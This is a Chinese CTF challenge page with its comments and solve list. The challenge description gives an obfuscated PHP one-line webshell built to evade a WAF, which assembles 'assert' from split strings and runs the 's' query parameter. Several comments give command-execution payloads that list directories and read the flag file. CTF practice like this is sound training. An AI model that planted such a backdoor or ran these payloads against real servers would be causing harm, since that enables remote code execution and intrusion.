shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 7921
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
我爱你制杖 2年前

注意描述,explode为分搁符。绕来绕去就是:assert($_GET['s'])

回复 1

xclay 2年前

这题告诉我们,学什么渗透,直接猜开发者留下的接口就可以了

回复 4

2224525664 3年前

没有提示的话这题是不是就做不出来了?

回复 1

Miludear 3年前

不懂语法的可直接参考 https://blog.csdn.net/changer_we/article/details/89304399 大佬的文章,很不错,简单易懂!

回复 2

zmcck 3年前

assert(s) ?s=system("ls") ?s=system("cat flag***.txt")

回复 0

17695688750 3年前

命令执行漏洞,我以为s和url间隔要用/隔开,没想到要用?隔开,淦

回复 0

XD6 3年前

有点蠢

回复 0

bright0flavor 3年前

①var_dump(scandir('./')) ②var_dump(file_get_contents('flaga15808abee46a1d5.txt'))

回复 1

笨笨笨蛋 3年前

构造system函数

回复 0

灵梦归希 3年前

过狗参数:passthru('cat%20flaga15808abee46a1d5.txt')

回复 0

WriteUp

image
harry

3 金币

评分(10)

解题动态

aixuexi666 攻破了该题 36分钟前
57 攻破了该题 2小时前
Thompson 攻破了该题 6小时前
song1997 攻破了该题 6小时前
zzz12311 攻破了该题 8小时前
yonge 攻破了该题 11小时前
ruirui102 攻破了该题 12小时前
祥子1 攻破了该题 12小时前
mixiu 攻破了该题 13小时前
tz001 攻破了该题 13小时前
Seb 攻破了该题 14小时前
迷宫 攻破了该题 14小时前
Cooper.juice 攻破了该题 1天前
SXWM 攻破了该题 1天前
Erec 攻破了该题 1天前
Frenemy 攻破了该题 1天前
hsk_zy 攻破了该题 1天前
谢特恒123 攻破了该题 1天前
admincon 攻破了该题 1天前
muyi111 攻破了该题 1天前
问题反馈